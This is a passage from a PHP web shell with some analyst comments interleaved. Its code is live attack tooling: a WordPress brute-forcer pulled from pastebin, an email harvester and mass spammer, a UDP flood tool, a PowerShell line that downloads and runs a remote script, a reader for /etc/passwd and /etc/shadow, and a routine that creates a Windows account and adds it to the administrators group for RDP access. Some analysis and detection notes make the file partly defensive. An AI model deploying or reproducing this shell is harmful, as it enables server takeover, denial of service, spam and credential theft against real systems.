632elseif (isset($_GET['x']) && ($_GET['x'] == 'word')) {
633 ?>
634 <font color="white"><br/><br/><center><h3>Wordpress scanner</h3></font>
635 <br/><form method = "POST">
636 <input type = "text" name = "url" placeholder="http://www.site.com/"/>
637 <input type = "submit" name = "Submit" value = "Finder"/>
638 </form>
639 <center><form method="POST">
640 <input type="submit" name="wordpress" value="Wordpress Brute">
641 </form></center>
642 <?
643 if(isset($_POST['wordpress'])){
644 $word = file_get_contents('http://pastebin.com/raw/iC5HXJB7');
645 file_put_contents($dir.'\wordpress.php', $word);
646 ?>
647 <a href="wordpress.php">Wordpress Brute</a>
648 <?
649 }
650 $shells = array("/robots.txt", "/info.php", "/.htaccess", "/wp-config.php.save", "/wp-config.txt");
651 foreach ($shells as $shell){
652 $headers = get_headers('$url$shell');
653 if(stristr($headers[0],"200")){
654 echo "<center><a href='$url$shell'>$url$shell</a> Founded!</center><br /><br/><br/>";
655 }
656 }
657}
658
659elseif (isset($_GET['x']) && ($_GET['x'] == 'spam')) {
660?>
661<center>
662 <font color="white"><br/><br/><center><h3>Spam Tool v 0.1</h3></font>
663
664 <form method="POST">
665 Email Dumper:<br/><br/>
666 <input type="text" name="dir">
667 <input type="submit" name="write" value="Dump"><br/><br/>
668 </form>
669 <form method="POST">
670 Email List:
671 <input type="text" name="List" placeholder="File Email List">
672 Subject:
673 <input type="text" name="subject" placeholder="Subject">
674 From:
675 <input type="text" name="from" placeholder="From">
676 <input type="submit" name="spam" value="Spam"><br/><br/>
677 Message<br/><br/>
678 <textarea cols=30 rows=20 name="message"></textarea>
679
680
681 </form>
682
683
684</center>
685
686<?
687function encdir($dir){
688 $j = 0;
689 $files = array_diff(scandir($dir), array('.', '..'));
690 foreach ($files as $filecip){
691 if(is_dir($dir.'\\'.$filecip)){
692 encdir($dir.'\\'.$filecip);
693 }else{
694 $j++;
695 $file = file($dir.'\\'.$filecip, FILE_IGNORE_NEW_LINES);
696 $file = array_filter($file,function($value){
697 return preg_match('/\'|@/',$value);
698 });
699 file_put_contents('email.txt',implode("\n",$file));
700 ?> <a href="email.txt">Email</a> <?
701 }
702 }
703}
704
705encdir($_POST['dir']);
706
707if(isset($_POST['spam'])){
708 $a = file_get_contents($_POST['List']);
709 $emails = explode ("\n",$a);
710 foreach ($emails as $to) {
711 $subject = $_POST['subject'];
712 $message = $_POST['message'];
713 $headers = 'From: '.$_POST['From']. "\r\n" .
714 'X-Mailer: PHP/' . phpversion();
715 mail($to, $subject, $message, $headers);
716 }
717}
718}
719
720elseif (isset($_GET['x']) && ($_GET['x'] == 'killer')) {
721 ?>
722 <font color="white"><br/><br/><center><h3>IP Killer</h3>
723 <form method="POST">
724 <font color="#00ff7f">
725 <table border="4px" cellspacing="3px" height="14px">
726 <tr>
727 <td><font color="red">IP: </td>
728 <td><input type="text" name="ip" placeholder="IP"><br/></td>
729 </tr>
730 <tr>
731 <td><font color="red">Time: </td>
732 <td><input type="text" name="time" placeholder="Time"></td>
733 </tr>
734 <tr>
735 <td><font color="red">Port: </td>
736 <td><input type="text" name="port" placeholder="Port"></td>
737 </tr>
738 </table>
739 <br/><input type="submit" name="go" value="Attack">
740
741 </form>
742 <?
743 if (isset($_POST['ip']) && isset($_POST['time'])){
744 $myhost = 'http://'.$_SERVER['HTTP_HOST'].'/'.$_SERVER['PHP_SELF'];
745 $pack = 0;
746 $port = $_POST['port'];
747 $size = 1000;
748 $exec = $_POST['time'];
749 $host = $_POST['ip'];
750 $time = time();
751 $max = $time+$exec;
752 for($i = 0; $i < $size; $i++) { $mess .= rand(0, 9); }
753 while (1) {
754 if(time() > $max){
755 break;
756 }
757 $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
758 if($fp){
759 $pack++;
760 fwrite($fp, $mess);
761 fclose($fp);
762 }
763 }
764 echo '<br/><br/><center>'.round(($pack / 65) * 1024, 3).' MB </center>';
765 }
766 }
767
768elseif (isset($_GET['x']) && ($_GET['x'] == 'sherlock')) {
769 echo '<font color="#00ff7f"><br/><br/><center><h3>Sherlock</h3></font>';
770 $oc = PHP_OS;
771 if(stripos($oc, 'WIN') !== False){
772 $sherlock = system("powershell.exe -nop -c IEX (New-Object Net.WebClient).downloadstring('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1');Find-AllVulns");
773 }
774}
775
// Analyst note: ?x=whois renders a lookup form and relays the query through
// this server, so the compromised host's address - not the operator's - is the
// source of the reconnaissance traffic.
// Defender view: outbound TCP/43 to whois.lacnic.net and HTTP fetches to
// 2whois.ru originating from the web-server account.
776elseif (isset($_GET['x']) && ($_GET['x'] == 'whois')) {
777 ?>
778 <font color="white"><br/><br/><center><h3>Intelligence Service</h3></font>
779 <br/><form method="POST">
780 <input type="text" name="domain">
781 <select name="Finder">
782 <option value="Whois">Whois </option>
783 <option value="Traceroute">Traceroute </option>
784 </select>
785 <input type="submit" name="finders" value="Find">
786 </form>
787 </center>
788
789 <?
// POST `domain` is read before the submit check and used unmodified below.
790 $domain = $_POST['domain'];
791 if(isset($_POST['finders'])){
792 $course = $_POST['Finder'];
793 if($course == 'Whois'){
// Raw WHOIS query: the value is written to port 43 followed by CRLF and the
// whole reply is collected and echoed without HTML escaping.
794 $fp = @fsockopen('whois.lacnic.net', 43, $errno, $errstr) or die("Socket Error " . $errno . " - " . $errstr);
795 fputs($fp, $domain . "\r\n");
796 $out = "";
797 while(!feof($fp)){
798 $out .= fgets($fp);
799 }
800 fclose($fp);
801 echo "<pre>\n" . $out . "\n</pre>\n";
802 }else{
// Any other selection: the value is concatenated (not URL-encoded) into a
// request to a third-party traceroute page, and the first <pre> section of
// that page is printed.
803 $a = file_get_contents('http://2whois.ru/?t=traceroute&data='.$domain);
804 $newPrice = preg_match_all('#<pre>(.+?)</pre>#is', $a, $arr);
805 echo "<pre>"; print_r($arr[1][0]); "</pre>";
806 }
807 }
808}
809
810
// Analyst note: ?x=grabc is a local file disclosure routine. It reads the
// Windows hosts file, then /etc/passwd and /etc/shadow, and prints the set
// that matches PHP_OS into a textarea without escaping.
// Defender view: /etc/shadow should not be readable by the web-server account
// at all; a successful read indicates the PHP process runs with excessive
// privilege. File-access auditing on these paths for the web-server account
// surfaces the attempt either way.
811elseif (isset($_GET['x']) && ($_GET['x'] == 'grabc')) {
812 $oc = PHP_OS;
// If the first read returns a falsy value, die() is called with the result of
// the second read and the script ends at this line.
813 $win = file_get_contents('C:\Windows\System32\drivers\etc\hosts') or die(file_get_contents('C:\Windows\System64\drivers\etc\hosts'));
814 $pass = file_get_contents('/etc/passwd');
815 $shad = file_get_contents('/etc/shadow');
816 ?>
817 <font color="white"><br/><br/><center><h3>Config Grabber</h3></font>
818 <center><textarea rows="40" cols="70"><? if(stripos($oc, 'WIN') !== False){ echo $win; } else { echo $pass.'<br>'.$shad; } ?></textarea></center>
819 <?
820}
821
// ?x=about prints a static credit line; it reads no other input and has no
// side effects. The literal text is a stable string to match on when hunting
// for copies of this shell on disk.
822if(isset($_GET['x']) && ($_GET['x'] == 'about')){
823 ?>
824 <center><h3>Thanks Stupidc0de Family</h3></center>
825 <?
826}
827
828
829 ///menu rdp
830if(isset($_GET['x']) && ($_GET['x'] == 'krdp'))
831
832 {
833 if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
834 {
835 ?><br/><br/>
836 <center>
837 <div id="content-left">
838 <form action="" method="post">
839 <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
840 <tr>
841 <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">CREATE RDP</font></td>
842 </tr>
843 <tr>
844 <td><font color="#00ff7f" class='kecew'>Username</font></td>
845 <td><font color="#00ff7f" class='kecew'> : </font></td>
846 <td><input type="text" class="bordergaya" name="username" required></td>
847 </tr>
848 <tr>
849 <td><font color="#00ff7f" class='kecew'>Password</font></td>
850 <td><font color="#00ff7f" class='kecew'> : </font></td>
851 <td><input type="text" class="bordergaya" name="password" required></td>
852 </tr>
853 <tr>
854 <td colspan="3" align="center"><input type="hidden" name="kshell" value="1"><input type="submit" name="submit" class="bordergaya" value="Create"></td>
855 </tr>
856 </table>
857 </form>
858 </div>
859 <br/>
860 <div id="content-left">
861 <form action="" method="post">
862 <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
863 <tr>
864 <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">OPTION</td>
865 </tr>
866 <tr>
867 <td><font color="#00ff7f" class='kecew'>Username</font></td>
868 <td><font color="#00ff7f" class='kecew'> : </font></td>
869 <td><input type="text" name="rusername" placeholder="Masukan Username" class="bordergaya"></td>
870 </tr>
871 <tr>
872 <td><font color="#00ff7f" class='kecew'>Password</font></td>
873 <td><font color="#00ff7f" class='kecew'> : </font></td>
874 <td><input type="text" name="gantipw" placeholder="Password Baru" class="bordergaya"></td>
875 </tr>
876 <tr>
877 <td><font color="#00ff7f" class='kecew'>Action</font></td>
878 <td><font color="#00ff7f" class='kecew'> : </font></td>
879 <td>
880 <select name="aksi" class="bordergaya">
881 <option value="1">Tampilkan Username</option>
882 <option value="2">Hapus Username</option>
883 <option value="3">Ubah Password</option>
884 </select>
885 </td>
886 </tr>
887 <tr>
888 <td colspan="3" align="center"><input type="hidden" name="kshell" value="2"><input type="submit" name="submit" class="bordergaya" value="Execute"></td>
889 </tr>
890 </table>
891 </form>
892 <br/>
893 </div>
894 </center></center></center>
895 <?php
896 if($_POST['submit'])
897 {
// Analyst note: "CREATE RDP" action (kshell=1). POST `username` and `password`
// are concatenated unescaped into `net user ... /add`, followed by three
// `net localgroup ... /add` calls using localised spellings of the local
// administrators group - i.e. it creates a local account and tries to make it
// an administrator. The same values are interpolated into a regex and echoed
// back, password included, without quoting or escaping.
// $gaya_root and $o are not defined in the visible part of the file.
// Defender view: Windows Security events 4720 (account created) and 4732
// (member added to a local group), and process-creation logs showing net.exe
// spawned by the web-server/PHP process.
898 if($_POST['kshell']=="1")
899 {
900 $r_user = $_POST['username'];
901 $r_pass = $_POST['password'];
// Existing accounts are listed first; the new name is matched against that
// listing as a regex pattern (substring match, not an exact comparison).
902 $cmd_cek_user = shell_exec("net user");
903 if(preg_match("/$r_user/", $cmd_cek_user)){
904 echo $gaya_root.$r_user." sudah ada".$o;
905 }else {
906 $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
907 $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
908 $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
909 $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
// Success or failure is inferred only from whether shell_exec returned output.
910 if($cmd_add_user){
911 echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil!</font></font><br/><br/>".$o;
912 }else {
913 echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='red'>Gagal!</font><br/><br/>".$o;
914 }
915 echo "<font class='rapihbanget'>[+] Sedang Memroses User.. Silahkan Tunggu Sebentar.. <br/>";
916 if($cmd_add_groups1){
917 echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
918 }else
919 if($cmd_add_groups2){
920 echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
921 }else
922 if($cmd_add_groups3){
923 echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
924 }else {
925 echo $gaya_root."<font class='rapihbanget'>--- Maaf User ".$r_user." <font color='red'>Gagal Di Proses!</font><br/><br/>".$o;
926 }
// Summary block: host name from the request plus the new credentials in
// clear text in the HTTP response (and therefore in any response capture).
927 echo "<font class='rapihbanget'>[+] Server Info : </font><br/>";
928 echo $gaya_root."<font class='rapihbanget'>--- ServerIP : ".$_SERVER["HTTP_HOST"]."</font><br/><font class='rapihbanget'>--- Username : ".$r_user."</font><br/><font class='rapihbanget'>--- Password : </font>".$r_pass.$o."</font><br/><br/>";
929 echo "<font class='rapihbanget'>[+] Thank For Using It ~_^ </font><br/><br/>";
930 }
931
932
933 }
// Analyst note: "OPTION" action (kshell=2), selected by POST `aksi`:
//   1 - print the output of `net user` (local account listing)
//   2 - run `net user <rusername> /DELETE`
//   3 - labelled as a password change in the form
// `rusername` is concatenated unescaped into the command line and interpolated
// into a regex; `gantipw` is echoed back in clear text.
// Defender view: net.exe spawned by the web-server/PHP process, and Windows
// Security event 4726 (account deleted) for action 2.
934 else if($_POST['kshell']=="2")
935 {
936 echo "<style>
937 .coeg{margin-left:30%;}
938 </style>";
939 if($_POST['aksi']=="1"){
940 echo "<pre class='coeg'>".shell_exec("net user");
941 }
942 else if($_POST['aksi']=="2")
943 {
944 $username = $_POST['rusername'];
945 $cmd_cek_user = shell_exec("net user");
946 if (!empty($username)){
// The name is matched as a regex pattern against the account listing before
// the delete command is issued.
947 if(preg_match("/$username/", $cmd_cek_user)){
948 $cmd_add_user = shell_exec("net user ".$username." /DELETE");
949 if($cmd_add_user){
950 echo "<font class='rapihbanget'>[+] Sedang Memroses.. Silahkan Tunggu.. </font><br /><br />";
951 echo $gaya_root."<font class='rapihbanget'>[+] Selamat! Remove User </font><font color='orange'>".$username." </font><font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
952 }else {
953 echo $gaya_root."<font class='rapihbanget'>[+] Yah :( Remove User </font><font color='orange'>".$username." </font><font color='red'>Gagal!!</font><br /><br />".$o;
954 }
955 }else {
956 echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
957 }
958 }else {
959 echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
960 }
961 }
962 else if($_POST['aksi']=="3")
963 {
964 echo "<style>
965 .tengahaja{margin-left:35%}
966 </style>";
967 $username = $_POST['rusername'];
968 $password = $_POST['gantipw'];
969 $cmd_cek_user = shell_exec("net user");
970 if (!empty($username)){
971 if(preg_match("/$username/", $cmd_cek_user)){
// The only command executed in this branch is `net user <username>`;
// $password appears solely in the echoed messages below.
972 $cmd_add_user = shell_exec("net user ".$username."");
973 if($cmd_add_user){
974 echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
975 }else {
976 echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='red'>Gagal!!</font><br /><br />".$o;
977 }
978 }else
979 {
980 echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
981 }
982 }else
983 {
984 echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
985 }
986 }
987 }
988
989 }
990 } else{
991 echo "<br><br><font color='springgreen' face='Fredericka The Great'>TOOLS GAK BISA DI PAKE NDAN -_- SERVERNYA BUKAN WINDOWS</font>";
992 }break;
993 }
994
995?>
996</body>